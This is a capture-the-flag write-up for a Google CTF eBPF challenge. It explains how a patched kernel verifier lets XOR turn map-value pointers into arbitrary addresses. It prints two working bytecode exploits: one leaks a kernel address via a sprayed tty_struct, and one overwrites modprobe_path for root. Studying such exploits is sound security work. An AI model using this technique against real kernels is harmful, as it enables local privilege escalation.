Last weekend we played Google CTF and I have solved 2 challenges: first 2 parts of fullchain and eBPF. The fullchain challenge is actually very easy: v8 bug and mojo bug are just basic OOB access bugs. However, eBPF is quite interesting for me, since it is my first time to learn and exploit eBPF module in Linux kernel, so it is worthy to do a write-up for it.

0x00 Overview

In this challenge, instead of a .ko kernel module like normal kernel exploit challenge, we are provided only with a patched Linux kernel. In the patch, verifier.c of eBPF is modified so that xor operation to pointer to map value can be allowed. The problem is when applying xor to a pointer 2 times using different value, we can actually manipulate the pointer to arbitrary address, so that we can have arbitrary read and write primitive. Then we can use this to leak kernel address by spraying and reading tty_struct, and to rewrite modprobe_path to get root privilege.

0x01 Introduction to eBPF

There are many useful resources about eBPF online, the ones that are most useful for me to solve this challenge are this introduction to low-level stuff of eBPF and this exploit of an eBPF CVE. To be short, eBPF is a virtual machine that runs in Linux kernel. We can provide bytecode to kernel in user program, and kernel will check if the bytecode is secure and valid to be run in kernel before loading them; if the check is passed, the kernel will load the bytecode and run it in certain event. Note that the check is done before the bytecode is run instead of when the bytecode is running. Therefore, if the check is somewhat wrong, which allows insecure bytecode to be loaded and run, the kernel can be compromised. This is exactly what this challenge is about.

eBPF Environment

Configuring development environment for eBPF in C takes me quite long time, because the sock_example provided cannot be compiled successfully on my computer. Finally, the CVE exploit mentioned above solved this problem for me, so that I can implement eBPF API using syscall directly. Thus finally, the only required header file is bpf_insn.h, which can be downloaded from Linux repository easily.

There is also another problem: we cannot compile the exploit using musl-gcc, which produces small binary. The problem is that it seems that musl-gcc cannot find the <linux/xxx.h> header files. I solved this by preprocessing exploit using gcc -E and compiling the preprocessing output using musl-gcc:

gcc -E exp.c -o fs/exp.c
musl-gcc -static fs/exp.c -o fs/exp

This is a quite useful trick when musl-gcc cannot compile the exploit that can be compiled using gcc.

0x02 Vulnerability

The first patch adds a bool auth_map field to struct bpf_reg_state, which is the structure used to represent the state of register when performing bytecode verification. The second patch allows BPF_XOR operation for PTR_TO_MAP_VALUE type register in function adjust_ptr_min_max_vals:

case BPF_XOR:
    // As long as we downgrade the result to scalar it is safe.
    if (dst_reg->type == PTR_TO_MAP_VALUE) {
        dst_reg->type = SCALAR_VALUE;
        dst_reg->auth_map = true;
        break;
    }

When BPF_XOR is applied to scalar register that is converted from PTR_TO_MAP_VALUE by BPF_XOR operation, it is set back to PTR_TO_MAP_VALUE type.

// in function adjust_scalar_min_max_vals
case BPF_XOR:
    /* Restore the pointer type.*/
    if (dst_reg->auth_map) {
        dst_reg->auth_map = false;
        dst_reg->type = PTR_TO_MAP_VALUE;
        break;
    }

The problem is obvious: if we apply BPF_XOR to PTR_TO_MAP_VALUE register, it will be converted to SCALAR_VALUE type and auth_map is set to true; then we apply BPF_XOR to that register again, since auth_map == true, the type is set back to PTR_TO_MAP_VALUE; however, the operand value provided to 2 BPF_XOR operations can be different, so we can actually set the register to be an arbitrary address but still being PTR_TO_MAP_VALUE type. This can lead to arbitrary memory read and write primitive eventually.

0x03 Exploitation

Get PTR_TO_MAP_VALUE Register

This actually takes me quite long time. I originally thought the value returned from BPF_LD_MAP_FD is PTR_TO_MAP_VALUE but it is actually not. Finally by reading source code and finding reference to RET_PTR_TO_MAP_VALUE_OR_NULL, we find that return type of BPF_FUNC_map_lookup_elem is RET_PTR_TO_MAP_VALUE_OR_NULL, and by checking NULL for it, we can get PTR_TO_MAP_VALUE type. This is also exactly shown in the example provided.

Therefore, we can apply BPF_XOR operation to that register, and it turns out that verification check is passed, which means the vulnerability has already been triggered. We can leak the address of BPF_MAP_TYPE_ARRAY by writing the result of BPF_XOR to the buffer and read the buffer in user space.

Leaking Kernel Address

After some investigation, I found that the BPF_MAP_TYPE_ARRAY buffer is probably stored on heap. Therefore, the idea is to spray tty_struct, which contains a kernel address at +0x18 offset, and read that field to get kernel address. However, after some trial, I found that it is hard to allocate tty_struct adjacent to the BPF_MAP_TYPE_ARRAY buffer; nonetheless, I also found that although tty_struct is quite far from BPF_MAP_TYPE_ARRAY buffer, the offset from the buffer to tty_struct is quite constant: 0x21ef0. Therefore, we can just add this constant offset to buffer address and read the +0x18 field to leak kernel address. However, this is not 100% stable and need some brute-force to make this assumption true.

The bytecode for leaking is shown below:

struct bpf_insn insns[]={
	BPF_MOV64_IMM(BPF_REG_0, 0),
	BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), /* *(u32 *)(fp - 4) = r0 */
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */
	BPF_LD_MAP_FD(BPF_REG_1, EXP_MAP_FD),
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 11+1),

	BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),
	BPF_MOV64_REG(BPF_REG_3, BPF_REG_0),
	BPF_ALU64_IMM(BPF_XOR, BPF_REG_2, 0), // convert r2, r1 to scalar
	BPF_ALU64_IMM(BPF_XOR, BPF_REG_1, 0),
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0x21ef0+0x18),
	BPF_ALU64_REG(BPF_XOR, BPF_REG_0, BPF_REG_2), // r0 = dst ^ src
	BPF_ALU64_REG(BPF_XOR, BPF_REG_1, BPF_REG_0), // r1 = src ^ dst ^ src = dst
	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_1, 0), // r2 = [dst] = kernel940
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0x451200), // r2 = &modprobe
	BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_2, 0), // store and leak modprobe

	BPF_JMP_IMM(BPF_JMP, BPF_REG_0, 0, 1),
	BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 */
	BPF_EXIT_INSN(),
};

There are also some points to note:

  1. We need to add some constant to register containing buffer address, but cannot use that register to load memory data directly later; this is because it seems that verifier can detect the out-of-bound access if we do this; so we need to use xor magic to indirectly make a PTR_TO_MAP_VALUE register pointing to tty_struct.
  2. One weird thing is, even if we don’t use BPF_XOR, we can still somewhat leak the address of buffer; I am not sure why this happens.
  3. You may ask why I only leak the kernel address in this step, instead of performing the whole exploitation that rewrites modprobe_path using arbitrary write; the problem is if operand register of BPF_XOR originates from load operation of PTR_TO_MAP_VALUE register, second BPF_XOR cannot convert the register back to PTR_TO_MAP_VALUE type. I would guess the reason that patch is added to adjust_scalar_min_max_vals, which, according to its name, is used to analyze range of a scalar; however, verifier cannot decide range of value loaded from BPF_MAP_TYPE_ARRAY memory, so this function will possibly not be called and the patch that converts scalar back to PTR_TO_MAP_VALUE is not triggered.
  4. It seems that sometimes if we apply BPF_XOR to a register for more than 2 times, the kernel will crash when loading the bytecode; I am not sure why this happens either.

Rewriting modprobe_path

Then we are going to exploit the bug again to rewrite modprobe_path and read the flag. This time, instead of loading address of modprobe_path from memory, we apply it directly as constant, so the problem in last step does not exist. Then we can use the xor magic again to have a PTR_TO_MAP_VALUE register pointing to &modprobe_path, so that storing to that register rewrites modprobe_path.

The bytecode is shown below:

struct bpf_insn insns2[]={
	BPF_MOV64_IMM(BPF_REG_0, 0),
	BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), /* *(u32 *)(fp - 4) = r0 */
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */
	BPF_LD_MAP_FD(BPF_REG_1, expmapfd),
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 28+1),

	BPF_MOV64_REG(BPF_REG_3, BPF_REG_0),
	BPF_ALU64_IMM(BPF_XOR, BPF_REG_3, 0), // convert r0, r3 to scalar
	BPF_ALU64_IMM(BPF_XOR, BPF_REG_0, 0),
	BPF_MOV64_IMM(BPF_REG_1, 0),
	BPF_MOV64_IMM(BPF_REG_2, (modprobe >> 0x30) & 0xffff),
	BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x30),
	BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),
	BPF_MOV64_IMM(BPF_REG_2, (modprobe >> 0x20) & 0xffff),
	BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x20),
	BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),
	BPF_MOV64_IMM(BPF_REG_2, (modprobe >> 0x10) & 0xffff),
	BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x10),
	BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),
	BPF_MOV64_IMM(BPF_REG_2, (modprobe) & 0xffff),
	BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = &modprobe
	BPF_ALU64_REG(BPF_XOR, BPF_REG_0, BPF_REG_1), // r0 = src ^ &modprobe
	BPF_ALU64_IMM(BPF_XOR, BPF_REG_0, 0), // convert r0 back to PTR_TO_MAP_VALUE
	BPF_ALU64_REG(BPF_XOR, BPF_REG_3, BPF_REG_0), // r3 = src ^ src ^ &modprobe
	BPF_MOV64_IMM(BPF_REG_4, 0),
	BPF_MOV64_IMM(BPF_REG_2, (tmp_x >> 0x20) & 0xffff),
	BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x20),
	BPF_ALU64_REG(BPF_OR, BPF_REG_4, BPF_REG_2),
	BPF_MOV64_IMM(BPF_REG_2, (tmp_x >> 0x10) & 0xffff),
	BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x10),
	BPF_ALU64_REG(BPF_OR, BPF_REG_4, BPF_REG_2),
	BPF_MOV64_IMM(BPF_REG_2, (tmp_x) & 0xffff),
	BPF_ALU64_REG(BPF_OR, BPF_REG_4, BPF_REG_2), // r4 = /tmp/x
	BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_4, 0), // rewrite modprobe_path

	BPF_JMP_IMM(BPF_JMP, BPF_REG_0, 0, 1),
	BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 */
	BPF_EXIT_INSN(),
};

There are also 2 points to note:

  1. We have to load the immediate number using BPF_LSH and BPF_OR, because BPF_MOV64_IMM can only support 32-bit signed immediate number.
  2. We cannot apply BPF_XOR, PTR_TO_MAP_VALUE register, &modprobe_path register directly because this will raise an error, since value of &modprobe_path is too low as signed 64-bit integer and is less than a minimum value; instead, we need to convert the register to scalar first before applying this operation, and after this operation the register becomes PTR_TO_MAP_VALUE again, so we need to apply a BPF_XOR again to convert it back to scalar. Fortunately, such 3-times BPF_XOR does not cause any crash when loading the bytecode.

The full exploit is here.

0x04 Conclusion

This challenge is quite good since I have learned a lot about eBPF when solving this challenge. I hope eBPF can also be a good attack interface when doing real world Linux kernel vulnerability research.